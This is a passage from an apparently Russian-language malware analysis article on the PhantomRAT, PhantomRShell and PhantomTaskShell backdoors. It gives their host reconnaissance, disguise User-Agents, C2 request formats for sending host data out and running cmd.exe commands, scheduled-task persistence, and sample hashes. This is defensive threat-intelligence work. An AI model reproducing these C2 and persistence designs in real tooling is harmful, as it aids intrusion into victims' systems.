\u0441\u00a0\u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/figcaption><\/div>\n<\/figure>\n<p>\u0412\u00a0\u043a\u043e\u0434\u0435 PhantomRAT<strong> <\/strong>\u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442\u0441\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c:<\/p>\n<p><code>POST \/check<\/code><\/p>\n<p>\u041e\u0434\u043d\u0430\u043a\u043e \u0432\u043d\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442\u00a0\u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430 \u0431\u044d\u043a\u0434\u043e\u0440 \u043d\u0435\u00a0\u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u0430\u00a0\u0434\u0430\u043d\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0442\u0435\u0441\u0442\u043e\u0432\u043e\u0439 \u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b:<\/p>\n<p><code>278f051832c4b2c95ba899d685478bd3430f74d21aea367377cc17788c3a5638<\/code><\/p>\n<p><code>c67cf425d688bba6dbe00e6d86a501f6978664ff99c1811c7104f4a3f4b7e884<\/code><\/p>\n<p><code>31cc62a06720e0c20f03e0cb912bb92b20e5f339ae9c7280b235f63ac35eda9a<\/code><\/p>\n<p><code>9287fd8adc333469eabe655ccf13b78e1abb6e42c0cc6817ae66372fb126a683<\/code><\/p>\n<p>\u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438:<\/p>\n<\/li>\n<li>\n<p>\u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 PE\u2011\u0444\u0430\u0439\u043b, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430\u00a0Go;<\/p>\n<\/li>\n<li>\n<p>\u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0442\u0435\u0445\u043d\u0438\u043a \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f;<\/p>\n<\/li>\n<li>\n<p>\u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0442\u0435\u0445\u043d\u0438\u043a \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f;<\/p>\n<\/li>\n<li>\n<p>\u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u043c\u043e\u0439 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435;<\/p>\n<\/li>\n<li>\n<p>\u0432\u0430\u0440\u0438\u0430\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0442\u0438\u043f\u043e\u0432 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0445 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435;<\/p>\n<\/li>\n<li>\n<p>\u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438;<\/p>\n<\/li>\n<li>\n<p>\u0437\u0430\u0448\u0438\u0442\u0430\u044f \u0432\u00a0\u043a\u043e\u0434 \u043a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u0430\u00a0\u2014 \u043f\u0443\u0442\u044c C:\\ProgramData.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>PhantomRShell<\/p>\n<ol>\n<li>\n<p>PhantomRShell\u00a0\u2014 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430\u00a0\u0421++ \u0431\u044d\u043a\u0434\u043e\u0440, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0432\u00a0\u0432\u0438\u0434\u0435 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 DLL \u043d\u0430\u00a0\u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0430\u0434\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u0434\u043b\u044f\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0435\u0439\u0434\u0436\u0435\u0439: PhantomTaskShell, PhantomProxyLite, MeshAgent, RSocx.<\/p>\n<p>\u0412\u00a0\u0431\u044d\u043a\u0434\u043e\u0440\u0435 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0442\u0435\u0445\u043d\u0438\u043a \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f (Persistence) \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435 \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (Defence Evasion).<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 (Discovery)<\/p>\n<p>PhantomRShell<strong> <\/strong>\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 WinAPI\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0434\u043b\u044f\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435:<\/p>\n<\/li>\n<\/ol>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\"><strong>\u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u0417\u043d\u0430\u0447\u0435\u043d\u0438\u0435<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u0421\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">GUID<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0412\u044b\u0437\u043e\u0432 WinAPI\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u0438 CoCreateGuid()<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">hostname<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0418\u043c\u044f \u0445\u043e\u0441\u0442\u0430<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0412\u044b\u0437\u043e\u0432 WinAPI\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u0438 GetComputerNameW()<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">AD<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0414\u043e\u043c\u0435\u043d<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0412\u044b\u0437\u043e\u0432 WinAPI\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u0438 GetComputerNameExW()<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0412\u00a0\u0441\u043b\u0443\u0447\u0430\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u0432\u00a0\u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u043e\u043a\u0430 \u00abUNKNOWN\u00bb.<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u0441\u043e\u0437\u0434\u0430\u044e\u0442\u0441\u044f \u0440\u0430\u0431\u043e\u0447\u0438\u0435 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438:<\/p>\n<ul>\n<li>\n<p>C:\\ProgramData\\YandexCloud<\/p>\n<\/li>\n<li>\n<p>C:\\ProgramData\\MicrosoftAppStore<\/p>\n<p>\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f (Command and Control)<\/p>\n<p>\u0412\u00a0\u0437\u0430\u043f\u0440\u043e\u0441\u0430\u0445 PhantomRShell<strong> <\/strong>\u043a\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0443 HTTP\u2011\u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a User\u2011Agent \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043e\u0434\u043d\u043e \u0438\u0437\u00a0\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439:<\/p>\n<\/li>\n<li>\n<p>YandexCloud\/1.0<\/p>\n<\/li>\n<li>\n<p>MicrosoftAppStore\/2001.0<\/p>\n<\/li>\n<\/ul>\n<p>PhantomRShell \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0442\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c. \u041f\u0440\u0438\u00a0\u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0431\u044d\u043a\u0434\u043e\u0440 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0442\u0430\u0439\u043c\u0430\u0443\u0442 \u0432 10\u00a0\u0441\u0435\u043a\u0443\u043d\u0434, \u043f\u043e\u00a0\u0438\u0441\u0442\u0435\u0447\u0435\u043d\u0438\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0446\u0438\u043a\u043b \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442\u0441\u044f. \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0432 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c, PhantomRShell \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435.<\/p>\n<p><code>GET \/poll?id=&amp;hostname=&amp;domain= User-Agent: YandexCloud\/1.0<\/code><\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 PhantomRShell<strong> <\/strong>\u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u043e\u0442\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435, \u0432\u00a0\u0434\u0432\u0443\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0445 \u0444\u043e\u0440\u043c\u0430\u0442\u0430\u0445:<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\"><strong>\u041a\u043e\u043c\u0430\u043d\u0434\u0430<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u041d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">cmd:&lt;cmd_data&gt;|&lt;cmd_ID&gt;<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b cmd_data \u0432\u00a0\u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 \u0432\u00a0\u0444\u043e\u0440\u043c\u0430\u0442\u0435:<\/p>\n<p align=\"left\">\n<p align=\"left\">cmd.exe \/C &lt;cmd_data&gt;<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">download:&lt; cmd_data &gt;|&lt;cmd_ID&gt;<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0444\u0430\u0439\u043b\u0430 \u0441\u00a0\u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430 \u0432\u00a0\u043e\u0434\u043d\u0443 \u0438\u0437\u00a0\u0440\u0430\u043d\u0435\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439:<\/p>\n<p align=\"left\">\n<p align=\"left\">\u2014 C:\\ProgramData\\YandexCloud<\/p>\n<p align=\"left\">\u2014 C:\\ProgramData\\MicrosoftAppStore<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b PhantomRShell<strong> <\/strong>\u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0430\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u00a0JSON \u0432\u00a0\u043f\u043e\u043b\u0435 result. \u0412\u00a0\u0441\u043b\u0443\u0447\u0430\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0444\u0430\u0439\u043b\u0430 \u0441\u00a0\u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430 \u0432\u00a0\u043f\u043e\u043b\u0435 result \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0441\u0442\u0440\u043e\u043a\u0438 Download successful:&lt;path&gt; \u0438\u043b\u0438\u00a0Download failed \u0432\u00a0\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442\u00a0\u0443\u0441\u043f\u0435\u0445\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438:<\/p>\n<p><code>POST \/result User-Agent: YandexCloud\/1.0<\/code><\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cd8\/065\/ae0\/cd8065ae01d4ae2b6514ca7d38a5d442.png\" alt=\"JSON \u0441 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b\" title=\"JSON \u0441 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b\" width=\"682\" height=\"179\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/cd8\/065\/ae0\/cd8065ae01d4ae2b6514ca7d38a5d442.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cd8\/065\/ae0\/cd8065ae01d4ae2b6514ca7d38a5d442.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>JSON \u0441\u00a0\u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/figcaption><\/div>\n<\/figure>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b:<\/p>\n<p><code>ed9b24a77a74cd34c96b30f8de794fe85eb1d9f188f516bd7d6020cc81a86728<\/code><\/p>\n<p><code>4c78d6bba282aaff0eab749cfa8a28e432f7cbf9c61dec8de8f4800fd27e0314<\/code><\/p>\n<p><code>204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e<\/code><\/p>\n<p><code>413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08<\/code><\/p>\n<p><code>b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a<\/code><\/p>\n<p><code>be14fc604c840c3afff9542106c73ed247417de5a56b1e9b2843e7947f0722d9<\/code><\/p>\n<p><code>01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be<\/code> <\/p>\n<p>\u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438:<\/p>\n<ul>\n<li>\n<p>\u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u0430\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 DLL, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u0430\u044f \u043d\u0430\u00a0\u0421++;<\/p>\n<\/li>\n<li>\n<p>\u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0442\u0435\u0445\u043d\u0438\u043a \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f;<\/p>\n<\/li>\n<li>\n<p>\u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0442\u0435\u0445\u043d\u0438\u043a \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f;<\/p>\n<\/li>\n<li>\n<p>\u0432\u0430\u0440\u0438\u0430\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0442\u0438\u043f\u043e\u0432 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0445 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435;<\/p>\n<\/li>\n<li>\n<p>\u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u043c\u043e\u0439 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435;<\/p>\n<\/li>\n<li>\n<p>\u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438;<\/p>\n<\/li>\n<li>\n<p>\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u044b\u0445 User\u2011Agent;<\/p>\n<\/li>\n<li>\n<p>\u0437\u0430\u0448\u0438\u0442\u0430\u044f \u0432\u00a0\u043a\u043e\u0434 \u043a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u0430\u00a0\u2014 \u043f\u0443\u0442\u044c C:\\ProgramData\\YandexCloud;<\/p>\n<\/li>\n<li>\n<p>\u0437\u0430\u0448\u0438\u0442\u0430\u044f \u0432\u00a0\u043a\u043e\u0434 \u043a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u0430\u00a0\u2014 \u043f\u0443\u0442\u044c C:\\ProgramData\\MicrosoftAppStore;<\/p>\n<\/li>\n<li>\n<p>\u043c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u043f\u043e\u0434\u00a0\u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 IT\u2011\u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>PhantomTaskShell<\/p>\n<p>PhantomTaskShell\u00a0\u2014 PowerShell\u2011\u0431\u044d\u043a\u0434\u043e\u0440, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u043d\u0430\u00a0\u0432\u0441\u0435\u0445 \u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438, \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0437\u0430\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435\u043c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0434\u043b\u044f\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u0445\u043e\u0441\u0442\u0430\u043c\u0438 \u0438\u0437\u00a0\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043d\u0435\u043b\u0438 Phantom \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0435\u0439\u0434\u0436\u0435\u0439: PhantomStealer, OpenSSH, XenArmor All\u2011In\u2011One Password Recovery Pro, RClone.<\/p>\n<p>\u041f\u0440\u0438\u00a0\u043f\u0435\u0440\u0432\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0435 PhantomTaskShell \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435 \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u0444\u0430\u0439\u043b update_id.txt, \u0432\u00a0\u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 GUID, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c\u043e\u0433\u043e \u0441\u00a0\u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u0438 [System.Guid]::NewGuid().<\/p>\n<p>\u0414\u043b\u044f\u00a0\u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435 \u0432\u00a0\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0435 Windows \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u0434\u0430\u0447\u0430 \u0441\u00a0\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c SystemAdminAgent_&lt;GUID&gt;, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0449\u0430\u044f PhantomTaskShell \u0432\u00a0\u0442\u0435\u0447\u0435\u043d\u0438\u0435 9999\u00a0\u0434\u043d\u0435\u0439 \u0432\u043d\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442\u00a0\u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0430 \u043f\u0438\u0442\u0430\u043d\u0438\u044f (\u0431\u0430\u0442\u0430\u0440\u0435\u044f \u0438\u043b\u0438\u00a0\u0430\u043a\u043a\u0443\u043c\u0443\u043b\u044f\u0442\u043e\u0440). \u041f\u0440\u0438\u00a0\u043a\u0430\u0436\u0434\u043e\u043c \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 update_id.txt \u0441\u00a0\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e\u00a0GUID.<\/p>\n<p>\u0412\u00a0\u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0431\u044d\u043a\u0434\u043e\u0440\u0430, \u043d\u0430\u00a0\u0447\u0442\u043e\u00a0\u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 update_id.txt, PhantomTaskShell 